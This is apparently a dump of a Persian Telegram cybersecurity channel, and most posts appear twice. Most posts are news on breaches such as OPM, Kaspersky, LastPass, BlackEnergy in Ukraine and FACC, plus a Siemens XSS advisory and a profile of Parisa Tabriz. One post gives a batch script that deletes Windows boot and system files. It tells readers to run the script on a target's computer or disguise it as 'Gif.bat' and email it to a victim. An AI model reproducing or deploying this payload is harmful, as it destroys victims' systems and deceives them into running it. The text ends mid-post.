۱📌) نفوذ هکرهای چینی به اطلاعات پرسنل نظامی و اطلاعاتی آمریکا
در ماه ژوئن ۲۰۱۵ نفوذگران چینی با هک کردن سیستمهای کامپیوتری دفتر مدیریت پرسنلی آمریکا (OPM) توانستند دادههای حساس و مهم مرتبط با مدارک و "تاییدیههای امنیتی" میلیونها نفر از کارکنان سرویسهای نظامی، اطلاعاتی و جاسوسی ایالات متحده را بربایند.
این ماجرا به بزرگترین نفوذ امنیتی به دادههای دولتی در تاریخ آمریکا موسوم شد و در جریان آن اطلاعات بیش از ۲۱ میلیون نفر از کارکنان دولت ربوده شد. برخی از مقامهای دولت آمریکا انگشت اتهام را به سوی دولت چین نشانه گرفتند، اما دولت چین با رد این اتهامات گفت که این عملیات کار مجرمان سازمانیافته بوده است.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
در ماه ژوئن ۲۰۱۵ نفوذگران چینی با هک کردن سیستمهای کامپیوتری دفتر مدیریت پرسنلی آمریکا (OPM) توانستند دادههای حساس و مهم مرتبط با مدارک و "تاییدیههای امنیتی" میلیونها نفر از کارکنان سرویسهای نظامی، اطلاعاتی و جاسوسی ایالات متحده را بربایند.
این ماجرا به بزرگترین نفوذ امنیتی به دادههای دولتی در تاریخ آمریکا موسوم شد و در جریان آن اطلاعات بیش از ۲۱ میلیون نفر از کارکنان دولت ربوده شد. برخی از مقامهای دولت آمریکا انگشت اتهام را به سوی دولت چین نشانه گرفتند، اما دولت چین با رد این اتهامات گفت که این عملیات کار مجرمان سازمانیافته بوده است.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌2- نفوذ به متخصصان نفوذ؛ حمله هکرها به کسپرسکی
کمپانی کسپرسکی، مستقر در مسکو، یکی از مهمترین کمپانیهای امنیت دیجیتال و تولید آنتیویروس در جهان است که صدها متخصص زبده از سراسر جهان در آن مشغول کارند. گروهی از هکرها که گفته میشود احتمالا از طراحان "استاکسنت" و "دیوکیو" بودهاند، شبکه این کمپانی امنیتی را هدف قرار دادند تا اطلاعاتی که این کمپانی از حملات سایبری تحت حمایت دولتها در اختیار دارد را بربایند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
کمپانی کسپرسکی، مستقر در مسکو، یکی از مهمترین کمپانیهای امنیت دیجیتال و تولید آنتیویروس در جهان است که صدها متخصص زبده از سراسر جهان در آن مشغول کارند. گروهی از هکرها که گفته میشود احتمالا از طراحان "استاکسنت" و "دیوکیو" بودهاند، شبکه این کمپانی امنیتی را هدف قرار دادند تا اطلاعاتی که این کمپانی از حملات سایبری تحت حمایت دولتها در اختیار دارد را بربایند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌3- نفوذ به ایمیلهای شخصی رئیس سازمان اطلاعات مرکزی آمریکا
در دنیایی که کمپانیهای امنیتی و متخصصان هک و نفوذ هم قربانی حملات سایبری میشوند، هیچکسی در برابر حمله مصون نیست. در ماه اکتبر، هکری ناشناس که خود را "دانشآموز" معرفی کرده بود، اعلام کرد که به ایمیل شخصی جان برنان، رئیس سیا، نفوذ کرده و اطلاعات محرمانه دولتی و شخصی او را ربوده است.
این هکر اقدام خود را "واکنشی به سیاست خارجی آمریکا" خواند و گفت که با انگیزههای سیاسی به این کار دست زده تا دولت آمریکا را رسوا کند. اندکی بعد مشخص شد که این اقدام کار گروهی از هکرها بوده که با تکنیکهای ساده "مهندسی اجتماعی" توانستند به اطلاعات خصوصی جان برنان دست پیدا کنند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
در دنیایی که کمپانیهای امنیتی و متخصصان هک و نفوذ هم قربانی حملات سایبری میشوند، هیچکسی در برابر حمله مصون نیست. در ماه اکتبر، هکری ناشناس که خود را "دانشآموز" معرفی کرده بود، اعلام کرد که به ایمیل شخصی جان برنان، رئیس سیا، نفوذ کرده و اطلاعات محرمانه دولتی و شخصی او را ربوده است.
این هکر اقدام خود را "واکنشی به سیاست خارجی آمریکا" خواند و گفت که با انگیزههای سیاسی به این کار دست زده تا دولت آمریکا را رسوا کند. اندکی بعد مشخص شد که این اقدام کار گروهی از هکرها بوده که با تکنیکهای ساده "مهندسی اجتماعی" توانستند به اطلاعات خصوصی جان برنان دست پیدا کنند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌4- نفوذ به "لستپَس"؛ سرویس امن ذخیرهسازی پسوردها
سرویس "LastPass" یکی از محبوبترین برنامههای تولید و ذخیرهسازی رمزهای عبور امن است، اما این سرویس امنیتی هم در سال ۲۰۱۵ قربانی حملات هکرها شد. نفوذگران با حمله به شبکه "لستپس" به انبوهی از آدرسهای ایمیل و پسوردهای رمزگذاریشده و عباراتی که کاربران برای یادآوری پسوردها تعیین کرده بودند، دست یافتند.
مسئولان این کمپانی گفتهاند که از روشهای پیچیدهای برای رمزگذاری دادهها و "مَسترپسورد"های کاربران استفاده میکردند، اما با این حال تاکید کردند که اگر پسوردهای اصلی کاربران رمزهای سادهای بوده باشد، احتمالا هکرها میتوانند با شکستن آنها به مجموعه دادههای محرمانه آنها دست پیدا کنند. اگر از سرویسی مانند "لستپس" استفاده میکنید، حتما عبارت پیچیدهای متشکل از حروف بزرگ و کوچک و اعداد و نشانهها را به عنوان پسورد اصلی تعیین کنید تا قربانی ساده حملات مشابه نباشید.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
سرویس "LastPass" یکی از محبوبترین برنامههای تولید و ذخیرهسازی رمزهای عبور امن است، اما این سرویس امنیتی هم در سال ۲۰۱۵ قربانی حملات هکرها شد. نفوذگران با حمله به شبکه "لستپس" به انبوهی از آدرسهای ایمیل و پسوردهای رمزگذاریشده و عباراتی که کاربران برای یادآوری پسوردها تعیین کرده بودند، دست یافتند.
مسئولان این کمپانی گفتهاند که از روشهای پیچیدهای برای رمزگذاری دادهها و "مَسترپسورد"های کاربران استفاده میکردند، اما با این حال تاکید کردند که اگر پسوردهای اصلی کاربران رمزهای سادهای بوده باشد، احتمالا هکرها میتوانند با شکستن آنها به مجموعه دادههای محرمانه آنها دست پیدا کنند. اگر از سرویسی مانند "لستپس" استفاده میکنید، حتما عبارت پیچیدهای متشکل از حروف بزرگ و کوچک و اعداد و نشانهها را به عنوان پسورد اصلی تعیین کنید تا قربانی ساده حملات مشابه نباشید.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌با پریسا تبریز، «شاهزاده امنیت» گوگل آشنا شوید
فعالیت در عرصه تکنولوژی سایبری چیزی نبوده که پریسا تبریز از همان کودکی در مسیرش گام برداشته باشد. او که تازه در زمان کالج برای نخستین بار با کامپیوتر کار کرده، حالا در ۳۱ سالگی "شاهزاده امنیت" کمپانی گوگل لقب گرفته است.
"شاهزاده امنیت" لقب رسمی پریسا تبریز، مسئول امنیت اطلاعات بنگاه گوگل است. او زیاد اهل مصاحبه نیست و شمار عکسهایی که از او در اینترنت پیدا میشود، کمتر از انگشتان یک دست است. نشریه معتبر فوربس، سال گذشته پریسا تبریز را در میان یکی از ۳۰ چهرهموفق زیر ۳۰ سال در عرصه فناوری در کنار مارک زاکربرگ، پایهگذار فیسبوک، جای داد.
به تازگی خبرنگار مجله "ELLE" به دیدار این کارمند ارشد گوگل، در مقر این کمپانی در کالیفرنیا رفته و با وی گفتوگویی انجام داده است. گفتوگو در سالن کنفرانس گوگل انجام شده، چون طبق قوانین گوگل خبرنگاران اجازه ورود به ساختمانی را که پریسا تبریز در آن کار میکند، ندارند. در تمام مدت گفتوگو نیز یک محافظ این خبرنگار را همراهی میکرده؛ حتی هنگام رفتن به دستشویی.
پریسا تبریز، ۳۱ ساله، در حومه شهر شیکاگو بزرگ شده است؛ مادرش پرستاری آمریکایی − لهستانی و پدرش یک پزشک مهاجر ایرانی است. او در سال ۲۰۰۷ به استخدام گوگل درآمد و دهمین عضو تیم کوچکی از هکرها در این کمپانی شد. وظیفه این تیم در یک کلام تأمین امنیت نرمافزارهای گوگل بود. اما اکنون این تیم گسترش یافته و بیش از ۲۵۰ متخصص امنیتی در گوگل مشغول به کار هستند.
پریسا تبریز آن طور که خود میگوید، در دوران کالج برای نخستین بار با کامپیوتر کار کرده و تا آن موقع وقتش را با هنر، ورزش و رقابت با دو برادرش سپری میکرده است. او که در ریاضی و علوم استعداد داشته، سپس وارد دانشگاه ایلینوی شده و اندکی بعد نیز علاقه به امور کامپیوتری در او بیدار میشود.
مقاومت در برابر وسوسه پول
پریسا تبریز به گروه هکرهای "کلاه سفید" تعلق دارد که در مقابل هکرهای "کلاه سیاه" قرار دارند. کلاه سفیدها به سیستمها نفوذ میکنند، اما از این نفوذ نیت بدی ندارند و هدفشان بررسی امنیت سیستم، شناسایی خلاءهای امنیتی و ارتقای استحکام سیستم است. او توضیح میدهد که برای استخدام به دنبال آنهایی باید باشند که توانایی رخنه به بهترینسیستمها را داشته باشند، اما در عین حال اینقدر از نظر شخصیتی قوی باشند که بتوانند در مقابل وسوسه پول مقاومت کنند و خریدنی نباشند.
در حال حاضر شرکتها به کسانی که قادر به یافتن باگها در سیستم باشند و آنها را گزارش دهند، پول پرداخت میکنند. برای مثال این مبلغ نزد گوگل، آن طور که خانم تبریز میگوید، از ۲۵ هزار تا ۶۰ هزار دلار متغیر است.
طبق گزارش مجله "ELLE" بخشی که پریسا تبریز ریاست آن را بر عهده دارد، بیش از ۳۰ هکر در اروپا و آمریکا را شامل میشود که کارشان بررسی تهدیدات امنیتی به طور ویژه مربوط به موتور جستجوی گوگل کروم است.
همین تیم بود که در سال ۲۰۱۱ متوجه هک شدن شرکت هلندی "دیجی نوتار" شد. هکرها در این حمله موفق به ربودن گواهینامههای امنیتی دیجیتال این شرکت و صدور گواهینامههای جعلی شده بودند و به این ترتیب حساب جیمیل صدها هزار کاربر ایرانی را هک کردند.
پریسا تبریز با نگاهی به آینده از کمرنگشدن اهمیت "رمز عبور" خبر میدهد. به گفته او ورود به کامپیوترها و حسابهای کاربری از راههای فیزیکی صورت میگیرد، نظیر اثر انگشت که هم اکنون آیفون از آن بهرهمیگیرد و این تازه آغاز راه است.—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
فعالیت در عرصه تکنولوژی سایبری چیزی نبوده که پریسا تبریز از همان کودکی در مسیرش گام برداشته باشد. او که تازه در زمان کالج برای نخستین بار با کامپیوتر کار کرده، حالا در ۳۱ سالگی "شاهزاده امنیت" کمپانی گوگل لقب گرفته است.
"شاهزاده امنیت" لقب رسمی پریسا تبریز، مسئول امنیت اطلاعات بنگاه گوگل است. او زیاد اهل مصاحبه نیست و شمار عکسهایی که از او در اینترنت پیدا میشود، کمتر از انگشتان یک دست است. نشریه معتبر فوربس، سال گذشته پریسا تبریز را در میان یکی از ۳۰ چهرهموفق زیر ۳۰ سال در عرصه فناوری در کنار مارک زاکربرگ، پایهگذار فیسبوک، جای داد.
به تازگی خبرنگار مجله "ELLE" به دیدار این کارمند ارشد گوگل، در مقر این کمپانی در کالیفرنیا رفته و با وی گفتوگویی انجام داده است. گفتوگو در سالن کنفرانس گوگل انجام شده، چون طبق قوانین گوگل خبرنگاران اجازه ورود به ساختمانی را که پریسا تبریز در آن کار میکند، ندارند. در تمام مدت گفتوگو نیز یک محافظ این خبرنگار را همراهی میکرده؛ حتی هنگام رفتن به دستشویی.
پریسا تبریز، ۳۱ ساله، در حومه شهر شیکاگو بزرگ شده است؛ مادرش پرستاری آمریکایی − لهستانی و پدرش یک پزشک مهاجر ایرانی است. او در سال ۲۰۰۷ به استخدام گوگل درآمد و دهمین عضو تیم کوچکی از هکرها در این کمپانی شد. وظیفه این تیم در یک کلام تأمین امنیت نرمافزارهای گوگل بود. اما اکنون این تیم گسترش یافته و بیش از ۲۵۰ متخصص امنیتی در گوگل مشغول به کار هستند.
پریسا تبریز آن طور که خود میگوید، در دوران کالج برای نخستین بار با کامپیوتر کار کرده و تا آن موقع وقتش را با هنر، ورزش و رقابت با دو برادرش سپری میکرده است. او که در ریاضی و علوم استعداد داشته، سپس وارد دانشگاه ایلینوی شده و اندکی بعد نیز علاقه به امور کامپیوتری در او بیدار میشود.
مقاومت در برابر وسوسه پول
پریسا تبریز به گروه هکرهای "کلاه سفید" تعلق دارد که در مقابل هکرهای "کلاه سیاه" قرار دارند. کلاه سفیدها به سیستمها نفوذ میکنند، اما از این نفوذ نیت بدی ندارند و هدفشان بررسی امنیت سیستم، شناسایی خلاءهای امنیتی و ارتقای استحکام سیستم است. او توضیح میدهد که برای استخدام به دنبال آنهایی باید باشند که توانایی رخنه به بهترینسیستمها را داشته باشند، اما در عین حال اینقدر از نظر شخصیتی قوی باشند که بتوانند در مقابل وسوسه پول مقاومت کنند و خریدنی نباشند.
در حال حاضر شرکتها به کسانی که قادر به یافتن باگها در سیستم باشند و آنها را گزارش دهند، پول پرداخت میکنند. برای مثال این مبلغ نزد گوگل، آن طور که خانم تبریز میگوید، از ۲۵ هزار تا ۶۰ هزار دلار متغیر است.
طبق گزارش مجله "ELLE" بخشی که پریسا تبریز ریاست آن را بر عهده دارد، بیش از ۳۰ هکر در اروپا و آمریکا را شامل میشود که کارشان بررسی تهدیدات امنیتی به طور ویژه مربوط به موتور جستجوی گوگل کروم است.
همین تیم بود که در سال ۲۰۱۱ متوجه هک شدن شرکت هلندی "دیجی نوتار" شد. هکرها در این حمله موفق به ربودن گواهینامههای امنیتی دیجیتال این شرکت و صدور گواهینامههای جعلی شده بودند و به این ترتیب حساب جیمیل صدها هزار کاربر ایرانی را هک کردند.
پریسا تبریز با نگاهی به آینده از کمرنگشدن اهمیت "رمز عبور" خبر میدهد. به گفته او ورود به کامپیوترها و حسابهای کاربری از راههای فیزیکی صورت میگیرد، نظیر اثر انگشت که هم اکنون آیفون از آن بهرهمیگیرد و این تازه آغاز راه است.—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
🔴چگونه یک کامپیوتر را به راحتی از کار بیاندازیم
کافی است مجموعه کد های زیر را در نرم افزاری مانند نوت پد وارد و با نام hackpc.bat ذخیره نمایید. پسوند .bat برای نام فایل ضروريست:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
سپس این فایل را در کامپیوتر مورد نظر اجرا کنید.یا
اینکه توسط ایمیلی به فرد موردنظر ارسال کنید کافیست نام فایل را به Gif.bat تغییر داده و فرد موردنظر به خیال عکس بودن روی فایل کلیک کرده و کد اجرا شود.
🚨🚨🚨به یاد داشته باشید که هیچ وقت این کدها را روی کامپیوتر خودتان اجرا نکنید.
.......
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
کافی است مجموعه کد های زیر را در نرم افزاری مانند نوت پد وارد و با نام hackpc.bat ذخیره نمایید. پسوند .bat برای نام فایل ضروريست:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
سپس این فایل را در کامپیوتر مورد نظر اجرا کنید.یا
اینکه توسط ایمیلی به فرد موردنظر ارسال کنید کافیست نام فایل را به Gif.bat تغییر داده و فرد موردنظر به خیال عکس بودن روی فایل کلیک کرده و کد اجرا شود.
🚨🚨🚨به یاد داشته باشید که هیچ وقت این کدها را روی کامپیوتر خودتان اجرا نکنید.
.......
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
🚨🚨 زیمنس وصله امنیتی برای محصولات اتوماسیون ساختمان ارائه داد
زیمنس به روز رسانی سیستم عامل برای رسیدگی به آسیب پذيري(XSS) موثر بر برخی از محصولات اتوماسیون ساختمان را منتشر کرد.
با توجه به اطلاعیه زیمنس، نقص وب سرور OZW به Synco و سایر محصولات یکپارچه برای نظارت از راه دور و کنترل دستگاه های عامل ساخت و ساز، مانند آنهایی که برای گرمایش و تهویه مطبوع استفاده میشود تاثیر می گذارد.
حفره امنیتی، به عنوان CVE-2016-1488 شناسایی، OZW672 و OZW772 ماژول های ارتباطات در حال اجرا سیستم عامل قبل از نسخه 6.00 تاثیر می گذارد. یک مهاجم می تواند آسیب پذیری با فریب کاربر به هدف قرار کلیک بر روی لینک های دستکاری شده بهره برداری.
آدیتیا سود، محقق اعتبار برای پیدا کردن و گزارش نقص XSS، گفت: اشکال در صفحه ورود به سایت در OZW672 و OZW772 تعبیه شده به وب سرور تاثیر می گذارد. و مهاجم می تواند با این ضعف به تغییر مسیر کاربران به وب سایت های فیشینگ، سرقت اطلاعات، و یا آنها را به دانلود نرم افزارهای مخرب بر روی دستگاه های خود مورد سوئ استفاده قرار گیرد.
لازم بدکردار است این آسیب پذیری به زیمنس از طریق ICS-CERT در 2015 ژوئن 10 گزارش شده است، اما پس از نزدیک به 7 ماه فروشنده به انتشار یک وصله اقدام کرده است. این نقص می تواند یک خطر جدی درصورت موفقیت به بهره برداری در برخواهد داشت.
"مهاجم می تواند به سادگی کاربر را فریب و هدف قراردهد با کلیک بر روی لینک صفحه وب، که به طور خودکار فرم HTTP باعث اجراي اسکریپت در مرورگر کاربرشود، که می تواند در دانلود از نرم افزارهای مخرب بر روی سیستم کاربر نهایی مورد بهره قرار گیرد.همچنین، ممکن است به آلوده شدن ماشین هایی که به عنوان بخشی از محیط SCADA استفاده می شود بیانجامد."
حملاتی که در آن سیستم های SCADA مورد هدف قرار میگیرند به طور فزاینده شایع است.حوادث اخیر در بخش انرژی اوکراین یک مثال کامل برای آسیب از یک حمله سایبری موفق می تواند باشد.
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
زیمنس به روز رسانی سیستم عامل برای رسیدگی به آسیب پذيري(XSS) موثر بر برخی از محصولات اتوماسیون ساختمان را منتشر کرد.
با توجه به اطلاعیه زیمنس، نقص وب سرور OZW به Synco و سایر محصولات یکپارچه برای نظارت از راه دور و کنترل دستگاه های عامل ساخت و ساز، مانند آنهایی که برای گرمایش و تهویه مطبوع استفاده میشود تاثیر می گذارد.
حفره امنیتی، به عنوان CVE-2016-1488 شناسایی، OZW672 و OZW772 ماژول های ارتباطات در حال اجرا سیستم عامل قبل از نسخه 6.00 تاثیر می گذارد. یک مهاجم می تواند آسیب پذیری با فریب کاربر به هدف قرار کلیک بر روی لینک های دستکاری شده بهره برداری.
آدیتیا سود، محقق اعتبار برای پیدا کردن و گزارش نقص XSS، گفت: اشکال در صفحه ورود به سایت در OZW672 و OZW772 تعبیه شده به وب سرور تاثیر می گذارد. و مهاجم می تواند با این ضعف به تغییر مسیر کاربران به وب سایت های فیشینگ، سرقت اطلاعات، و یا آنها را به دانلود نرم افزارهای مخرب بر روی دستگاه های خود مورد سوئ استفاده قرار گیرد.
لازم بدکردار است این آسیب پذیری به زیمنس از طریق ICS-CERT در 2015 ژوئن 10 گزارش شده است، اما پس از نزدیک به 7 ماه فروشنده به انتشار یک وصله اقدام کرده است. این نقص می تواند یک خطر جدی درصورت موفقیت به بهره برداری در برخواهد داشت.
"مهاجم می تواند به سادگی کاربر را فریب و هدف قراردهد با کلیک بر روی لینک صفحه وب، که به طور خودکار فرم HTTP باعث اجراي اسکریپت در مرورگر کاربرشود، که می تواند در دانلود از نرم افزارهای مخرب بر روی سیستم کاربر نهایی مورد بهره قرار گیرد.همچنین، ممکن است به آلوده شدن ماشین هایی که به عنوان بخشی از محیط SCADA استفاده می شود بیانجامد."
حملاتی که در آن سیستم های SCADA مورد هدف قرار میگیرند به طور فزاینده شایع است.حوادث اخیر در بخش انرژی اوکراین یک مثال کامل برای آسیب از یک حمله سایبری موفق می تواند باشد.
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
Forwarded from کانال تخصصی امنیت سایبری «کتاس»
This media is not supported in your browser
VIEW IN TELEGRAM
خبر : Windows Bridge(ابزار پورت کردن اپلیکشن های ios به ویندوز) به صورت Open Source منتشر شد!
چندی پیش مایکروسافت در کنفرانس بیلد 2015 یک پیش نمایش از Windows Bridg برای ios را ارائه کرد که به صورت Open Source منتشر شد. در واقع این ابزار قبلا با اسم پروژه Islandwood استفاده می شد اما در حال حاضر نام آن به Windows Bridge برای ios تغییر کرده که به صورت پیش نمایش ارائه شده است
http://barnamenevisan.org/Articles/Article4476.html
چندی پیش مایکروسافت در کنفرانس بیلد 2015 یک پیش نمایش از Windows Bridg برای ios را ارائه کرد که به صورت Open Source منتشر شد. در واقع این ابزار قبلا با اسم پروژه Islandwood استفاده می شد اما در حال حاضر نام آن به Windows Bridge برای ios تغییر کرده که به صورت پیش نمایش ارائه شده است
http://barnamenevisan.org/Articles/Article4476.html
barnamenevisan.org
Windows Bridge(ابزار پورت کردن اپلیکشن های ios به ویندوز) به صورت Open Source منتشر شد!
چندی پیش مایکروسافت در کنفرانس بیلد 2015 یک پیش نمایش از Windows Bridg برای ios را ارائه کرد که به صورت Open Source منتشر شد. در واقع این ابزار قبلا با اسم پروژه Islandwood استفاده می شد اما در حال حاضر نام آن به Windows Bridge برای ios تغییر کرده که به…
📌موج جدیدی از حملات سایبری علیه صنعت برق اوکراین
(20 و 21 ژانویه 2016)
در دور جدیدی از حملات، نیروگاههای برق اوکراین مورد حمله سایبری قرار گرفتند، اینبار از طریق malware که بر پایه تروجان منبع باز و آزادانه در دسترس که هیچ کس انتظار آن را نداشته اتفاق افتاده است. این malware سعی نموده است که به سیستم خرید از طریق یک فایل XLS اکسل مخرب بصورت فریب فیشنگ در ضمیمه یک ایمیل دست پیداکند.
نام این تروجان BlackEnergy می باشد برای کسب اطلاعات بیشتر به آدرس های زیر مراجعه نمایید:
http://www.theregister.co.uk/2016/01/21/ukraine_energy_utilities_attacked_again_with_open_source_trojan_backdoor/
http://www.scmagazine.com/new-wave-of-attacks-on-ukrainian-power-plants/article/466473/
http://thehill.com/policy/cybersecurity/266603-security-researcher-ukraine-power-grid-facing-new-wave-of-cyberattacks
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
(20 و 21 ژانویه 2016)
در دور جدیدی از حملات، نیروگاههای برق اوکراین مورد حمله سایبری قرار گرفتند، اینبار از طریق malware که بر پایه تروجان منبع باز و آزادانه در دسترس که هیچ کس انتظار آن را نداشته اتفاق افتاده است. این malware سعی نموده است که به سیستم خرید از طریق یک فایل XLS اکسل مخرب بصورت فریب فیشنگ در ضمیمه یک ایمیل دست پیداکند.
نام این تروجان BlackEnergy می باشد برای کسب اطلاعات بیشتر به آدرس های زیر مراجعه نمایید:
http://www.theregister.co.uk/2016/01/21/ukraine_energy_utilities_attacked_again_with_open_source_trojan_backdoor/
http://www.scmagazine.com/new-wave-of-attacks-on-ukrainian-power-plants/article/466473/
http://thehill.com/policy/cybersecurity/266603-security-researcher-ukraine-power-grid-facing-new-wave-of-cyberattacks
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
www.theregister.co.uk
Ukraine energy utilities attacked again with open source Trojan backdoor
Macro phish attempts to hook BlackEnergy borscht and battered sector
📌سازنده قطعات هواپیمایی ایرباس،مبلغ $ 54M را در سرقت سایبری از دست داد
یک شرکت مهندسی اتریشی پس از اعتراف به ضعف امنیتی IT به دنبال "سرقت سایبری" اعلام کرد هزینه کسری حسابهایش مبلغ $ 54M بوده است
گروه عملیاتی FACC که قطعات هواپیما برای غولهای هواپیمایی مانند بوئینگ و ایرباس می سازد، و اکثریت سهام آن متعلق به یک شرکت سهامی چینی است. اصرار دارد در این نفوذ سرورهای مالکیت معنوی، مهندسی، و عملیات در معرض خطر نبوده اند، و صرفا از لحاظ مالی متضرر شده است.
شرکت در بیانیه ای گفت: "گروه حسابداری مالی گروه عملیاتی FACC هدف تقلب سایبری قرار گرفته است. زیرساختهای FACC IT، امنیت داده ها، IPها و همچنین کسب و کار عملیاتی گروه توسط فعالیت های جنایی سایبری تحت تاثیر قرار نگرفته است. و آسیب وارده صرفا خروج حدود 50 میلیون یورو از بودجه در جریان است. هیئت مدیره اقدامات ساختاری فوری درنظر گرفته است و درحال ارزیابی خسارات و مطالبات بیمه میباشد."
تحقیقات اولیه و شواهد موجود حاکی از نفوذ از درون توسط افراد ناشناس است که مدیریت کل سیستم های حفاظت و سیستم های پرداخت الکترونیکی را دردست گرفته و باعث انحراف مسیر مقدار زیادی از پول نقد شده اند.
پلیس اتریش در حال بررسی، سرور های مالی شرکت برای پیدا کردن مجرمان است. این کاوش ها ممکن است ماه ها طول بکشد.
در پی انتشار این خبر قیمت سهام FACC تقریبا 20 درصد کاهش یافت.
آدرس خبر :
http://www.theregister.co.uk/2016/01/22/austrian_firm_loses_54m_hacking_attack/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
یک شرکت مهندسی اتریشی پس از اعتراف به ضعف امنیتی IT به دنبال "سرقت سایبری" اعلام کرد هزینه کسری حسابهایش مبلغ $ 54M بوده است
گروه عملیاتی FACC که قطعات هواپیما برای غولهای هواپیمایی مانند بوئینگ و ایرباس می سازد، و اکثریت سهام آن متعلق به یک شرکت سهامی چینی است. اصرار دارد در این نفوذ سرورهای مالکیت معنوی، مهندسی، و عملیات در معرض خطر نبوده اند، و صرفا از لحاظ مالی متضرر شده است.
شرکت در بیانیه ای گفت: "گروه حسابداری مالی گروه عملیاتی FACC هدف تقلب سایبری قرار گرفته است. زیرساختهای FACC IT، امنیت داده ها، IPها و همچنین کسب و کار عملیاتی گروه توسط فعالیت های جنایی سایبری تحت تاثیر قرار نگرفته است. و آسیب وارده صرفا خروج حدود 50 میلیون یورو از بودجه در جریان است. هیئت مدیره اقدامات ساختاری فوری درنظر گرفته است و درحال ارزیابی خسارات و مطالبات بیمه میباشد."
تحقیقات اولیه و شواهد موجود حاکی از نفوذ از درون توسط افراد ناشناس است که مدیریت کل سیستم های حفاظت و سیستم های پرداخت الکترونیکی را دردست گرفته و باعث انحراف مسیر مقدار زیادی از پول نقد شده اند.
پلیس اتریش در حال بررسی، سرور های مالی شرکت برای پیدا کردن مجرمان است. این کاوش ها ممکن است ماه ها طول بکشد.
در پی انتشار این خبر قیمت سهام FACC تقریبا 20 درصد کاهش یافت.
آدرس خبر :
http://www.theregister.co.uk/2016/01/22/austrian_firm_loses_54m_hacking_attack/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
www.theregister.co.uk
Airbus, Boeing aero parts maker loses $54m in cyber-stick-up
The hills are alive with the sound of cursing
📌 آلودگی ویندوز ایکس پی کامپیوترهای بیمارستان ملبورن استرالیا با تروجان
(ژانویه 2016)
کامپیوترهای بخش پاتولوژی بیمارستان سلطنتی ملبورن در ویکتوریا، استرالیا با نرم افزارهای مخرب در هفته گذشته آلوده شدند. بانک خون به روش های دستی برای پردازش نمونه بازگشته است و پاسخ مراجعان را بصورت تلفنی صرفا ارائه میکند و سیستم های آنلاین این بخش از کار افتاده اند. این موضوع بر رایانه های شخصی با سیستم عامل ویندوز XP تاثیر می گذارد.
برای اطلاعات تکمیلی به ادرسهای زیر مراجعه نمایید:
